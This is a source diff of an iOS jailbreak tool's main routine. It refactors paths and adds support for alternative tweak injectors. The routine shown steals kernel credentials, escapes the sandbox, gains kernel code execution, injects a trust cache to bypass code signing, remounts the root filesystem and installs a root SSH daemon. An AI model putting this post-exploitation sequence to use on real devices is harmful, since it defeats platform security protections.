+    _assert(clean_file(success_file), localize(@"Unable to clean success file."), true);
 #define insertstatus(x) do { [status appendString:x]; } while (false)
-#define progress(x) do { LOG("Progress: %@", x); updateProgressHUD(hud, x); } while (false)
 #define sync_prefs() do { _assert(set_prefs(prefs), localize(@"Unable to synchronize app preferences. Please restart the app and try again."), true); } while (false)
 #define write_test_file(file) do { \
-    _assert(create_file(file, 0, 0644), localize(@"Unable to create test file."), true); \
+    _assert(create_file(file, root_pw->pw_uid, 0644), localize(@"Unable to create test file."), true); \
     _assert(clean_file(file), localize(@"Unable to clean test file."), true); \
 } while (false)
 #define inject_trust_cache() do { \
@@ -139,7 +162,7 @@ void jailbreak()
         progress(localize(@"Exploiting kernel..."));
         bool exploit_success = NO;
         myHost = mach_host_self();
-        _assert(MACH_PORT_VALID(myHost), localize(NSLocalizedString(@"Unable to get host port.", nil)), true);
+        _assert(MACH_PORT_VALID(myHost), localize(@"Unable to get host port."), true);
         myOriginalHost = myHost;
         if (restore_kernel_task_port(&tfp0) &&
             restore_kernel_base(&kernel_base, &kernel_slide) &&
@@ -241,6 +264,10 @@ void jailbreak()
             char *const original_kernel_cache_path = "/System/Library/Caches/com.apple.kernelcaches/kernelcache";
             const char *decompressed_kernel_cache_path = [homeDirectory stringByAppendingPathComponent:@"Documents/kernelcache.dec"].UTF8String;
             if (!canRead(decompressed_kernel_cache_path)) {
+                kptr_t sandbox = KPTR_NULL;
+                if (!canRead(original_kernel_cache_path)) {
+                    sandbox = swap_sandbox_for_proc(proc_struct_addr(), KPTR_NULL);
+                }
                 FILE *const original_kernel_cache = fopen(original_kernel_cache_path, "rb");
                 _assert(original_kernel_cache != NULL, localize(@"Unable to open original kernelcache for reading."), true);
                 FILE *const decompressed_kernel_cache = fopen(decompressed_kernel_cache_path, "w+b");
@@ -248,10 +275,13 @@ void jailbreak()
                 _assert(decompress_kernel(original_kernel_cache, decompressed_kernel_cache, NULL, true) == ERR_SUCCESS, localize(@"Unable to decompress kernelcache."), true);
                 fclose(decompressed_kernel_cache);
                 fclose(original_kernel_cache);
+                if (KERN_POINTER_VALID(sandbox)) {
+                    swap_sandbox_for_proc(proc_struct_addr(), sandbox);
+                }
             }
             char *kernelVersion = getKernelVersion();
             _assert(kernelVersion != NULL, localize(@"Unable to get kernel version."), true);
-            if (init_kernel(NULL, 0, decompressed_kernel_cache_path) != ERR_SUCCESS ||
+            if (init_kernel(NULL, KPTR_NULL, decompressed_kernel_cache_path) != ERR_SUCCESS ||
                 find_strref(kernelVersion, 1, string_base_const, true, false) == KPTR_NULL) {
                 _assert(clean_file(decompressed_kernel_cache_path), localize(@"Unable to clean corrupted kernelcache."), true);
                 _assert(false, localize(@"Unable to initialize patchfinder."), true);
@@ -266,7 +296,6 @@ void jailbreak()
             setoffset(auth_ptrs, true);
             LOG("Detected authentication pointers.");
             pmap_load_trust_cache = _pmap_load_trust_cache;
-            prefs->ssh_only = true;
             sync_prefs();
         }
         if (monolithic_kernel) {
@@ -344,6 +373,8 @@ void jailbreak()
         find_offset(strlen, NULL, true);
         find_offset(issue_extension_for_mach_service, NULL, true);
         find_offset(issue_extension_for_absolute_path, NULL, true);
+        find_offset(IOMalloc, NULL, true);
+        find_offset(IOFree, NULL, true);
         found_offsets = true;
         LOG("Successfully found offsets.");
         
@@ -377,19 +408,22 @@ void jailbreak()
         myOriginalCredAddr = give_creds_to_process_at_addr(myProcAddr, myCredAddr);
         LOG("myOriginalCredAddr = " ADDR, myOriginalCredAddr);
         _assert(KERN_POINTER_VALID(myOriginalCredAddr), localize(@"Unable to steal kernel's credentials."), true);
-        _assert(setuid(0) == ERR_SUCCESS, localize(@"Unable to set user id."), true);
-        _assert(getuid() == 0, localize(@"Unable to verify user id."), true);
+        _assert(setuid(root_pw->pw_uid) == ERR_SUCCESS, localize(@"Unable to set user id."), true);
+        _assert(getuid() == root_pw->pw_uid, localize(@"Unable to verify user id."), true);
         myHost = mach_host_self();
         _assert(MACH_PORT_VALID(myHost), localize(@"Unable to upgrade host port."), true);
         LOG("Successfully escaped sandbox.");
-        LOG("Setting HSP4 as TFP0...");
-        _assert(set_hsp4(tfp0), localize(@"Unable to set HSP4."), true);
-        _assert(set_kernel_task_info(), localize(@"Unable to set kernel task info."), true);
-        LOG("Successfully set HSP4 as TFP0.");
-        insertstatus(localize(@"Set HSP4 as TFP0.\n"));
         LOG("Initializing kernel code execution...");
         _assert(init_kexec(), localize(@"Unable to initialize kernel code execution."), true);
         LOG("Successfully initialized kernel code execution.");
+        LOG("Setting HSP4 as TFP0...");
+        _assert(set_hsp4(tfp0), localize(@"Unable to set HSP4."), true);
+        LOG("Successfully set HSP4 as TFP0.");
+        insertstatus(localize(@"Set HSP4 as TFP0.\n"));
+        LOG("Setting kernel task info...");
+        _assert(set_kernel_task_info(), localize(@"Unable to set kernel task info."), true);
+        LOG("Successfully set kernel task info.");
+        insertstatus(localize(@"Set kernel task info.\n"));
         LOG("Platformizing...");
         _assert(set_platform_binary(myProcAddr, true), localize(@"Unable to make my task a platform task."), true);
         _assert(set_cs_platform_binary(myProcAddr, true), localize(@"Unable to make my codesign blob a platform blob."), true);
@@ -486,7 +520,7 @@ void jailbreak()
         NSData *const fileData = [[NSString stringWithFormat:@(ADDR "\n"), kernel_slide] dataUsingEncoding:NSUTF8StringEncoding];
         if (![[NSData dataWithContentsOfFile:file] isEqual:fileData]) {
             _assert(clean_file(file.UTF8String), localize(@"Unable to clean old kernel slide log."), true);
-            _assert(create_file_data(file.UTF8String, 0, 0644, fileData), localize(@"Unable to log kernel slide."), true);
+            _assert(create_file_data(file.UTF8String, root_pw->pw_uid, 0644, fileData), localize(@"Unable to log kernel slide."), true);
         }
         LOG("Successfully logged slide.");
         insertstatus(localize(@"Logged slide.\n"));
@@ -534,7 +568,7 @@ void jailbreak()
             
             progress(localize(@"Enabling Auto Updates..."));
             for (id path in array) {
-                ensure_directory([path UTF8String], 0, 0755);
+                ensure_directory([path UTF8String], root_pw->pw_uid, 0755);
             }
             _assert(modifyPlist(@"/var/mobile/Library/Preferences/com.apple.Preferences.plist", ^(id plist) {
                 plist[@"kBadgedForSoftwareUpdateKey"] = @YES;
@@ -590,7 +624,7 @@ void jailbreak()
             if (is_mountpoint(hardwareMountPoint)) {
                 _assert(unmount(hardwareMountPoint, MNT_FORCE) == ERR_SUCCESS, localize(@"Unable to unmount hardware mount point."), true);
             }
-            _assert(ensure_directory(rootFsMountPoint, 0, 0755), localize(@"Unable to create RootFS mount point."), true);
+            _assert(ensure_directory(rootFsMountPoint, root_pw->pw_uid, 0755), localize(@"Unable to create RootFS mount point."), true);
             const char *argv[] = {"/sbin/mount_apfs", thedisk, rootFsMountPoint, NULL};
             _assert(runCommandv(argv[0], 3, argv, ^(pid_t pid) {
                 kptr_t const procStructAddr = get_proc_struct_for_pid(pid);
@@ -613,6 +647,10 @@ void jailbreak()
             LOG("Snapshots on newly mounted RootFS:");
             for (const char **snapshot = snapshots; *snapshot; snapshot++) {
                 LOG("\t%s", *snapshot);
+                if (strcmp(*snapshot, original_snapshot) == 0) {
+                    LOG("Clearing old original system snapshot...");
+                    _assert(fs_snapshot_delete(rootfd, original_snapshot, 0) == ERR_SUCCESS, localize(@"Unable to clear old original system snapshot."), true);
+                }
             }
             SafeFreeNULL(snapshots);
             NSString *const systemVersionPlist = @"/System/Library/CoreServices/SystemVersion.plist";
@@ -757,8 +795,8 @@ void jailbreak()
         // Create jailbreak directory.
         
         progress(localize(@"Creating jailbreak directory..."));
-        _assert(ensure_directory("/jb", 0, 0755), localize(@"Unable to create jailbreak directory."), true);
-        _assert(chdir("/jb") == ERR_SUCCESS, localize(@"Unable to change working directory to jailbreak directory."), true);
+        _assert(ensure_directory(jailbreakDirectory, root_pw->pw_uid, 0755), localize(@"Unable to create jailbreak directory."), true);
+        _assert(chdir(jailbreakDirectory) == ERR_SUCCESS, localize(@"Unable to change working directory to jailbreak directory."), true);
         LOG("Successfully created jailbreak directory.");
         insertstatus(localize(@"Created jailbreak directory.\n"));
     }
@@ -766,7 +804,7 @@ void jailbreak()
     upstage();
     
     {
-        NSString *const offsetsFile = @"/jb/offsets.plist";
+        NSString *const offsetsFile = NSJailbreakFile(@"offsets.plist");
         NSMutableDictionary *dictionary = [NSMutableDictionary new];
 #define cache_address(value, name) do { \
     dictionary[@(name)] = ADDRSTRING(value); \
@@ -819,7 +857,7 @@ void jailbreak()
             
             progress(localize(@"Caching offsets..."));
             _assert(([dictionary writeToFile:offsetsFile atomically:YES]), localize(@"Unable to cache offsets to file."), true);
-            _assert(init_file(offsetsFile.UTF8String, 0, 0644), localize(@"Unable to set permissions for offset cache file."), true);
+            _assert(init_file(offsetsFile.UTF8String, root_pw->pw_uid, 0644), localize(@"Unable to set permissions for offset cache file."), true);
             LOG("Successfully cached offsets.");
             insertstatus(localize(@"Cached Offsets.\n"));
         }
@@ -855,23 +893,23 @@ void jailbreak()
                 _assert(unmount(systemSnapshotMountPoint, MNT_FORCE) == ERR_SUCCESS, localize(@"Unable to unmount old snapshot mount point."), true);
             }
             _assert(clean_file(systemSnapshotMountPoint), localize(@"Unable to clean old snapshot mount point."), true);
-            _assert(ensure_directory(systemSnapshotMountPoint, 0, 0755), localize(@"Unable to create snapshot mount point."), true);
+            _assert(ensure_directory(systemSnapshotMountPoint, root_pw->pw_uid, 0755), localize(@"Unable to create snapshot mount point."), true);
             _assert(fs_snapshot_mount(rootfd, systemSnapshotMountPoint, snapshot, 0) == ERR_SUCCESS, localize(@"Unable to mount original snapshot."), true);
             const char *systemSnapshotLaunchdPath = [@(systemSnapshotMountPoint) stringByAppendingPathComponent:@"sbin/launchd"].UTF8String;
             _assert(waitForFile(systemSnapshotLaunchdPath) == ERR_SUCCESS, localize(@"Unable to verify mounted snapshot."), true);
-            _assert(extractDebsForPkg(@"rsync", nil, false), localize(@"Unable to extract rsync."), true);
-            _assert(extractDebsForPkg(@"uikittools", nil, false), localize(@"Unable to extract uikittools."), true);
+            _assert(extractDebsForPkg(@"rsync", nil, false, true), localize(@"Unable to extract rsync."), true);
+            _assert(extractDebsForPkg(@"uikittools", nil, false, true), localize(@"Unable to extract uikittools."), true);
             inject_trust_cache();
             if (kCFCoreFoundationVersionNumber < kCFCoreFoundationVersionNumber_iOS_11_3) {
-                _assert(runCommand("/usr/bin/rsync", "-vaxcH", "--progress", "--delete-after", "--exclude=/Developer", "--exclude=/usr/bin/uicache", "--exclude=/usr/bin/find", [@(systemSnapshotMountPoint) stringByAppendingPathComponent:@"."].UTF8String, "/", NULL) == 0, localize(@"Unable to sync /Applications."), true);
+                _assert(runCommand("/usr/bin/rsync", "-vaxcH", "--progress", "--delete-after", "--exclude=/Developer", "--exclude=/usr/bin/uicache", "--exclude=/usr/bin/find", [@(systemSnapshotMountPoint) stringByAppendingPathComponent:@"."].UTF8String, "/", NULL) == 0, localize(@"Unable to sync /."), true);
             } else {
-                _assert(runCommand("/usr/bin/rsync", "-vaxcH", "--progress", "--delete", [@(systemSnapshotMountPoint) stringByAppendingPathComponent:@"Applications/."].UTF8String, "/Applications", NULL) == 0, localize(@"Unable to sync /."), true);
+                _assert(runCommand("/usr/bin/rsync", "-vaxcH", "--progress", "--delete", [@(systemSnapshotMountPoint) stringByAppendingPathComponent:@"Applications/."].UTF8String, "/Applications", NULL) == 0, localize(@"Unable to sync /Applications."), true);
             }
             _assert(unmount(systemSnapshotMountPoint, MNT_FORCE) == ERR_SUCCESS, localize(@"Unable to unmount original snapshot mount point."), true);
             close(rootfd);
             SafeFreeNULL(snapshot);
             SafeFreeNULL(snapshots);
-            _assert(runCommand("/usr/bin/uicache", NULL) == ERR_SUCCESS, localize(@"Unable to refresh icon cache."), true);
+            _assert(runCommand("/usr/bin/uicache", NULL) >= 0, localize(@"Unable to refresh icon cache."), true);
             _assert(clean_file("/usr/bin/uicache"), localize(@"Unable to clean uicache binary."), true);
             _assert(clean_file("/usr/bin/find"), localize(@"Unable to clean find binary."), true);
             LOG("Successfully reverted back RootFS remount.");
@@ -938,9 +976,9 @@ void jailbreak()
         if (!verifySums(pathForResource(@"binpack64-256.md5sums"), HASHTYPE_MD5)) {
             ArchiveFile *const binpack64 = [ArchiveFile archiveWithFile:pathForResource(@"binpack64-256.tar.lzma")];
             _assert(binpack64 != nil, localize(@"Unable to open binpack."), true);
-            _assert([binpack64 extractToPath:@"/jb"], localize(@"Unable to extract binpack."), true);
+            _assert([binpack64 extractToPath:NSJailbreakDirectory], localize(@"Unable to extract binpack."), true);
             for (id file in binpack64.files.allKeys) {
-                NSString *const path = [@"/jb" stringByAppendingPathComponent:file];
+                NSString *const path = [NSJailbreakDirectory stringByAppendingPathComponent:file];
                 if (cdhashFor(path) != nil) {
                     if (![toInjectToTrustCache containsObject:path]) {
                         [toInjectToTrustCache addObject:path];
@@ -948,8 +986,7 @@ void jailbreak()
                 }
             }
         }
-        NSFileManager *const fileManager = [NSFileManager defaultManager];
-        NSDirectoryEnumerator *directoryEnumerator = [fileManager enumeratorAtURL:[NSURL URLWithString:@"/jb"] includingPropertiesForKeys:@[NSURLIsDirectoryKey] options:0 errorHandler:nil];
+        NSDirectoryEnumerator *directoryEnumerator = [fileManager enumeratorAtURL:[NSURL URLWithString:NSJailbreakDirectory] includingPropertiesForKeys:@[NSURLIsDirectoryKey] options:0 errorHandler:nil];
         _assert(directoryEnumerator != nil, localize(@"Unable to create directory enumerator."), true);
         for (id URL in directoryEnumerator) {
             NSString *const path = [URL path];
@@ -977,24 +1014,24 @@ void jailbreak()
         }
         inject_trust_cache();
         NSString *const binpackMessage = localize(@"Unable to setup binpack.");
-        _assert(ensure_symlink("/jb/usr/bin/scp", "/usr/bin/scp"), binpackMessage, true);
-        _assert(ensure_directory("/usr/local/lib", 0, 0755), binpackMessage, true);
-        _assert(ensure_directory("/usr/local/lib/zsh", 0, 0755), binpackMessage, true);
-        _assert(ensure_directory("/usr/local/lib/zsh/5.0.8", 0, 0755), binpackMessage, true);
-        _assert(ensure_symlink("/jb/usr/local/lib/zsh/5.0.8/zsh", "/usr/local/lib/zsh/5.0.8/zsh"), binpackMessage, true);
-        _assert(ensure_symlink("/jb/bin/zsh", "/bin/zsh"), binpackMessage, true);
-        _assert(ensure_symlink("/jb/etc/zshrc", "/etc/zshrc"), binpackMessage, true);
-        _assert(ensure_symlink("/jb/usr/share/terminfo", "/usr/share/terminfo"), binpackMessage, true);
-        _assert(ensure_symlink("/jb/usr/local/bin", "/usr/local/bin"), binpackMessage, true);
-        _assert(ensure_symlink("/jb/etc/profile", "/etc/profile"), binpackMessage, true);
-        _assert(ensure_directory("/etc/dropbear", 0, 0755), binpackMessage, true);
-        _assert(ensure_directory("/jb/Library", 0, 0755), binpackMessage, true);
-        _assert(ensure_directory("/jb/Library/LaunchDaemons", 0, 0755), binpackMessage, true);
-        _assert(ensure_directory("/jb/etc/rc.d", 0, 0755), binpackMessage, true);
-        if (access("/jb/Library/LaunchDaemons/dropbear.plist", F_OK) != ERR_SUCCESS) {
+        _assert(ensure_symlink(jailbreak_file("usr/bin/scp"), "/usr/bin/scp"), binpackMessage, true);
+        _assert(ensure_directory("/usr/local/lib", root_pw->pw_uid, 0755), binpackMessage, true);
+        _assert(ensure_directory("/usr/local/lib/zsh", root_pw->pw_uid, 0755), binpackMessage, true);
+        _assert(ensure_directory("/usr/local/lib/zsh/5.0.8", root_pw->pw_uid, 0755), binpackMessage, true);
+        _assert(ensure_symlink(jailbreak_file("/usr/local/lib/zsh/5.0.8/zsh"), "/usr/local/lib/zsh/5.0.8/zsh"), binpackMessage, true);
+        _assert(ensure_symlink(jailbreak_file("bin/zsh"), "/bin/zsh"), binpackMessage, true);
+        _assert(ensure_symlink(jailbreak_file("etc/zshrc"), "/etc/zshrc"), binpackMessage, true);
+        _assert(ensure_symlink(jailbreak_file("usr/share/terminfo"), "/usr/share/terminfo"), binpackMessage, true);
+        _assert(ensure_symlink(jailbreak_file("usr/local/bin"), "/usr/local/bin"), binpackMessage, true);
+        _assert(ensure_symlink(jailbreak_file("etc/profile"), "/etc/profile"), binpackMessage, true);
+        _assert(ensure_directory("/etc/dropbear", root_pw->pw_uid, 0755), binpackMessage, true);
+        _assert(ensure_directory(jailbreak_file("Library"), root_pw->pw_uid, 0755), binpackMessage, true);
+        _assert(ensure_directory(jailbreak_file("Library/LaunchDaemons"), root_pw->pw_uid, 0755), binpackMessage, true);
+        _assert(ensure_directory(jailbreak_file("etc/rc.d"), root_pw->pw_uid, 0755), binpackMessage, true);
+        if (access(jailbreak_file("Library/LaunchDaemons/dropbear.plist"), F_OK) != ERR_SUCCESS) {
             NSMutableDictionary *dropbear_plist = [NSMutableDictionary new];
             _assert(dropbear_plist, localize(@"Unable to allocate memory for dropbear plist."), true);
-            dropbear_plist[@"Program"] = @"/jb/usr/local/bin/dropbear";
+            dropbear_plist[@"Program"] = NSJailbreakFile(@"usr/local/bin/dropbear");
             dropbear_plist[@"RunAtLoad"] = @YES;
             dropbear_plist[@"Label"] = @"ShaiHulud";
             dropbear_plist[@"KeepAlive"] = @YES;
@@ -1003,33 +1040,36 @@ void jailbreak()
             dropbear_plist[@"ProgramArguments"][1] = @"-F";
             dropbear_plist[@"ProgramArguments"][2] = @"-R";
             dropbear_plist[@"ProgramArguments"][3] = @"--shell";
-            dropbear_plist[@"ProgramArguments"][4] = @"/jb/bin/bash";
+            dropbear_plist[@"ProgramArguments"][4] = NSJailbreakFile(@"bin/bash");
             dropbear_plist[@"ProgramArguments"][5] = @"-p";
             dropbear_plist[@"ProgramArguments"][6] = @"22";
-            _assert([dropbear_plist writeToFile:@"/jb/Library/LaunchDaemons/dropbear.plist" atomically:YES], localize(@"Unable to create dropbear launch daemon."), true);
-            _assert(init_file("/jb/Library/LaunchDaemons/dropbear.plist", 0, 0644), localize(@"Unable to initialize dropbear launch daemon."), true);
+            _assert([dropbear_plist writeToFile:NSJailbreakFile(@"Library/LaunchDaemons/dropbear.plist") atomically:YES], localize(@"Unable to create dropbear launch daemon."), true);
+            _assert(init_file(jailbreak_file("Library/LaunchDaemons/dropbear.plist"), root_pw->pw_uid, 0644), localize(@"Unable to initialize dropbear launch daemon."), true);
         }
         if (prefs->load_daemons) {
-            for (id file in [fileManager contentsOfDirectoryAtPath:@"/jb/Library/LaunchDaemons" error:nil]) {
-                NSString *const path = [@"/jb/Library/LaunchDaemons" stringByAppendingPathComponent:file];
-                runCommand("/jb/bin/launchctl", "load", path.UTF8String, NULL);
+            for (id file in [fileManager contentsOfDirectoryAtPath:NSJailbreakFile(@"Library/LaunchDaemons") error:nil]) {
+                NSString *const path = [NSJailbreakFile(@"Library/LaunchDaemons") stringByAppendingPathComponent:file];
+                runCommand(jailbreak_file("bin/launchctl"), "load", path.UTF8String, NULL);
             }
-            for (id file in [fileManager contentsOfDirectoryAtPath:@"/jb/etc/rc.d" error:nil]) {
-                NSString *const path = [@"/jb/etc/rc.d" stringByAppendingPathComponent:file];
+            for (id file in [fileManager contentsOfDirectoryAtPath:NSJailbreakFile(@"etc/rc.d") error:nil]) {
+                NSString *const path = [NSJailbreakFile(@"etc/rc.d") stringByAppendingPathComponent:file];
                 if ([fileManager isExecutableFileAtPath:path]) {
-                    runCommand("/jb/bin/bash", "-c", path.UTF8String, NULL);
+                    runCommand(jailbreak_file("bin/bash"), "-c", path.UTF8String, NULL);
                 }
             }
         }
         if (prefs->run_uicache) {
-            _assert(runCommand("/jb/usr/bin/uicache", NULL) == ERR_SUCCESS, localize(@"Unable to refresh icon cache."), true);
+            _assert(runCommand(jailbreak_file("usr/bin/uicache"), NULL) == ERR_SUCCESS, localize(@"Unable to refresh icon cache."), true);
         }
-        _assert(runCommand("/jb/bin/launchctl", "stop", "com.apple.cfprefsd.xpc.daemon", NULL) == ERR_SUCCESS, localize(@"Unable to flush preference cache."), true);
+        _assert(runCommand(jailbreak_file("bin/launchctl"), "stop", "com.apple.cfprefsd.xpc.daemon", NULL) == ERR_SUCCESS, localize(@"Unable to flush preference cache."), true);
         LOG("Successfully enabled SSH.");
         insertstatus(localize(@"Enabled SSH.\n"));
     }
     
-    if (auth_ptrs || prefs->ssh_only) {
+    if (prefs->code_substitutor != -1) {
+        substitutor = get_substitutor_info(prefs->code_substitutor);
+        _assert(substitutor != NULL, localize(@"Unable to get substitutor info."), true);
+    } else {
         goto out;
     }
     
@@ -1048,21 +1088,21 @@ void jailbreak()
         // Make sure we have an apt packages cache
         _assert(ensureAptPkgLists(), localize(@"Unable to extract apt package lists."), true);
         
-        needSubstrate = ( needStrap ||
-                         (access("/usr/libexec/substrate", F_OK) != ERR_SUCCESS) ||
-                         !verifySums(@"/var/lib/dpkg/info/mobilesubstrate.md5sums", HASHTYPE_MD5)
+        needSubstitutor = ( needStrap ||
+                         (access(substitutor->startup_executable, F_OK) != ERR_SUCCESS) ||
+                         !verifySums([NSString stringWithFormat:@"/var/lib/dpkg/info/%s.md5sums", substitutor->package_id], HASHTYPE_MD5)
                          );
-        if (needSubstrate) {
-            LOG(@"We need substrate.");
-            NSString *const substrateDeb = debForPkg(@"mobilesubstrate");
-            _assert(substrateDeb != nil, localize(@"Unable to get deb for Substrate."), true);
-            if (pidOfProcess("/usr/libexec/substrated") == 0) {
-                _assert(extractDeb(substrateDeb), localize(@"Unable to extract Substrate."), true);
+        if (needSubstitutor) {
+            LOG(@"We need %s.", substitutor->name);
+            NSString *const substitutorDeb = debForPkg(@(substitutor->package_id));
+            _assert(substitutor != nil, localize(@"Unable to get deb for %s.", substitutor->name), true);
+            if (pidOfProcess(substitutor->server_executable) == 0) {
+                _assert(extractDeb(substitutorDeb, doInject), localize(@"Unable to extract %s.", substitutor->name), true);
             } else {
-                skipSubstrate = YES;
-                LOG("Substrate is running, not extracting again for now.");
+                skipSubstitutor = YES;
+                LOG("%s is running, not extracting again for now.", substitutor->name);
             }
-            [debsToInstall addObject:substrateDeb];
+            [debsToInstall addObject:substitutorDeb];
         }
         
         NSArray *resourcesPkgs = resolveDepsForPkg(@"jailbreak-resources", true);
@@ -1078,8 +1118,8 @@ void jailbreak()
         NSMutableArray *pkgsToRepair = [NSMutableArray new];
         LOG("Resource Pkgs: \"%@\".", resourcesPkgs);
         for (id pkg in resourcesPkgs) {
-            // Ignore mobilesubstrate because we just handled that separately.
-            if ([pkg isEqualToString:@"mobilesubstrate"] || [pkg isEqualToString:@"firmware"])
+            // Ignore substitutor because we just handled that separately.
+            if ([pkg isEqualToString:@(substitutor->package_id)] || [pkg isEqualToString:@"firmware"])
                 continue;
             if (verifySums([NSString stringWithFormat:@"/var/lib/dpkg/info/%@.md5sums", pkg], HASHTYPE_MD5)) {
                 LOG("Pkg \"%@\" verified.", pkg);
@@ -1096,7 +1136,7 @@ void jailbreak()
             LOG(@"(Re-)Extracting \"%@\".", pkgsToRepair);
             NSArray <NSString *> *const debsToRepair = debsForPkgs(pkgsToRepair);
             _assert(debsToRepair.count == pkgsToRepair.count, localize(@"Unable to get debs for packages to repair."), true);
-            _assert(extractDebs(debsToRepair), localize(@"Unable to repair packages."), true);
+            _assert(extractDebs(debsToRepair, doInject), localize(@"Unable to repair packages."), true);
             [debsToInstall addObjectsFromArray:debsToRepair];
         }
         
@@ -1109,9 +1149,9 @@ void jailbreak()
         
         // These don't need to lay around
         clean_file("/Library/LaunchDaemons/jailbreakd.plist");
-        clean_file("/jb/jailbreakd.plist");
-        clean_file("/jb/amfid_payload.dylib");
-        clean_file("/jb/libjailbreak.dylib");
+        clean_file(jailbreak_file("jailbreakd.plist"));
+        clean_file(jailbreak_file("amfid_payload.dylib"));
+        clean_file(jailbreak_file("libjailbreak.dylib"));
         
         LOG("Successfully copied over resources to RootFS.");
         insertstatus(localize(@"Copied over resources to RootFS.\n"));
@@ -1124,11 +1164,13 @@ void jailbreak()
         
         progress(localize(@"Injecting trust cache..."));
         [resources addObjectsFromArray:[NSArray arrayWithContentsOfFile:@"/usr/share/jailbreak/injectme.plist"]];
-        // If substrate is already running but was broken, skip injecting again
-        if (!skipSubstrate) {
-            [resources addObject:@"/usr/libexec/substrate"];
+        // If substitutor is already running but was broken, skip injecting again
+        if (!skipSubstitutor) {
+            [resources addObject:@(substitutor->startup_executable)];
+        }
+        for (char **resource = substitutor->resources; *resource; resource++) {
+            [resources addObject:@(*resource)];
         }
-        [resources addObject:@"/usr/libexec/substrated"];
         for (id file in resources) {
             if (![toInjectToTrustCache containsObject:file]) {
                 [toInjectToTrustCache addObject:file];
@@ -1146,7 +1188,7 @@ void jailbreak()
         
         progress(localize(@"Repairing filesystem..."));
         
-        _assert(ensure_directory("/var/lib", 0, 0755), localize(@"Unable to repair state information directory"), true);
+        _assert(ensure_directory("/var/lib", root_pw->pw_uid, 0755), localize(@"Unable to repair state information directory"), true);
         
         // Make sure dpkg is not corrupted
         if (is_directory("/var/lib/dpkg")) {
@@ -1155,14 +1197,14 @@ void jailbreak()
                 _assert(clean_file("/var/lib/dpkg"), localize(@"Unable to clean old dpkg database."), true);
             } else {
                 LOG(@"Moving /var/lib/dpkg to /Library/dpkg...");
-                _assert([[NSFileManager defaultManager] moveItemAtPath:@"/var/lib/dpkg" toPath:@"/Library/dpkg" error:nil], localize(@"Unable to restore dpkg database."), true);
+                _assert([fileManager moveItemAtPath:@"/var/lib/dpkg" toPath:@"/Library/dpkg" error:nil], localize(@"Unable to restore dpkg database."), true);
             }
         }
         
         _assert(ensure_symlink("/Library/dpkg", "/var/lib/dpkg"), localize(@"Unable to symlink dpkg database."), true);
-        _assert(ensure_directory("/Library/dpkg", 0, 0755), localize(@"Unable to repair dpkg database."), true);
-        _assert(ensure_file("/var/lib/dpkg/status", 0, 0644), localize(@"Unable to repair dpkg status file."), true);
-        _assert(ensure_file("/var/lib/dpkg/available", 0, 0644), localize(@"Unable to repair dpkg available file."), true);
+        _assert(ensure_directory("/Library/dpkg", root_pw->pw_uid, 0755), localize(@"Unable to repair dpkg database."), true);
+        _assert(ensure_file("/var/lib/dpkg/status", root_pw->pw_uid, 0644), localize(@"Unable to repair dpkg status file."), true);
+        _assert(ensure_file("/var/lib/dpkg/available", root_pw->pw_uid, 0644), localize(@"Unable to repair dpkg available file."), true);
         
         // Make sure firmware-sbin package is not corrupted.
         NSString *file = [NSString stringWithContentsOfFile:@"/var/lib/dpkg/info/firmware-sbin.list" encoding:NSUTF8StringEncoding error:nil];
@@ -1176,8 +1218,8 @@ void jailbreak()
         // Make sure this is a symlink - usually handled by ncurses pre-inst
         _assert(ensure_symlink("/usr/lib", "/usr/lib/_ncurses"), localize(@"Unable to repair ncurses."), true);
         
-        // This needs to be there for Substrate to work properly
-        _assert(ensure_directory("/Library/Caches", 0, S_ISVTX | S_IRWXU | S_IRWXG | S_IRWXO), localize(@"Unable to repair caches directory for Substrate."), true);
+        // This needs to be there for substitutor to work properly
+        _assert(ensure_directory("/Library/Caches", root_pw->pw_uid, S_ISVTX | S_IRWXU | S_IRWXG | S_IRWXO), localize(@"Unable to repair caches directory for %s.", substitutor->name), true);
         LOG("Successfully repaired filesystem.");
         
         insertstatus(localize(@"Repaired Filesystem.\n"));
@@ -1186,30 +1228,30 @@ void jailbreak()
     upstage();
     
     {
-        // Load Substrate
+        // Load substitutor
         
-        // Set Disable Loader.
-        progress(localize(@"Setting Disable Loader..."));
+        // Configure substitutor.
+        progress(localize(@"Configuring %s...", substitutor->name));
         if (prefs->load_tweaks) {
-            clean_file("/var/tmp/.substrated_disable_loader");
+            clean_file(substitutor->loader_killswitch);
         } else {
-            _assert(create_file("/var/tmp/.substrated_disable_loader", 0, 644), localize(@"Unable to disable Substrate's loader."), true);
+            _assert(create_file(substitutor->loader_killswitch, root_pw->pw_uid, 644), localize(@"Unable to disable %s's loader.", substitutor->name), true);
         }
-        LOG("Successfully set Disable Loader.");
+        LOG("Successfully configured %s.", substitutor->name);
         
-        // Run substrate
-        progress(localize(@"Starting Substrate..."));
+        // Run substitutor
+        progress(localize(@"Starting %s...", substitutor->name));
         if (access("/Library/substrate", F_OK) == ERR_SUCCESS &&
             is_directory("/Library/substrate") &&
-            access("/usr/lib/substrate", F_OK) == ERR_SUCCESS &&
-            is_symlink("/usr/lib/substrate")) {
-            _assert(clean_file("/usr/lib/substrate"), localize(@"Unable to clean old substrate directory."), true);
-            _assert([[NSFileManager defaultManager] moveItemAtPath:@"/Library/substrate" toPath:@"/usr/lib/substrate" error:nil], localize(@"Unable to move substrate directory."), true);
+            access(substitutor->bootstrap_tools, F_OK) == ERR_SUCCESS &&
+            is_symlink(substitutor->bootstrap_tools)) {
+            _assert(clean_file(substitutor->bootstrap_tools), localize(@"Unable to clean old %s bootstrap tools directory.", substitutor->name), true);
+            _assert([fileManager moveItemAtPath:@"/Library/substrate" toPath:@(substitutor->bootstrap_tools) error:nil], localize(@"Unable to move %s bootstrap tools directory.", substitutor->name), true);
         }
-        _assert(runCommand("/usr/libexec/substrate", NULL) == ERR_SUCCESS, localize(skipSubstrate?@"Unable to restart Substrate.":@"Unable to start Substrate."), skipSubstrate?false:true);
-        LOG("Successfully started Substrate.");
+        _assert(runCommand(substitutor->startup_executable, NULL) == ERR_SUCCESS, localize(@"Unable to %@ %s.", skipSubstitutor ? @"restart" : @"start", substitutor->name), skipSubstitutor?false:true);
+        LOG("Successfully started %s.", substitutor->name);
         
-        insertstatus(localize(@"Loaded Substrate.\n"));
+        insertstatus(localize(@"Loaded %s.\n", substitutor->name));
     }
     
     upstage();
@@ -1220,7 +1262,7 @@ void jailbreak()
         
         if (!pkgIsConfigured("xz")) {
             removePkg("lzma", true);
-            extractDebsForPkg(@"lzma", debsToInstall, false);
+            extractDebsForPkg(@"lzma", debsToInstall, false, doInject);
             inject_trust_cache();
         }
         
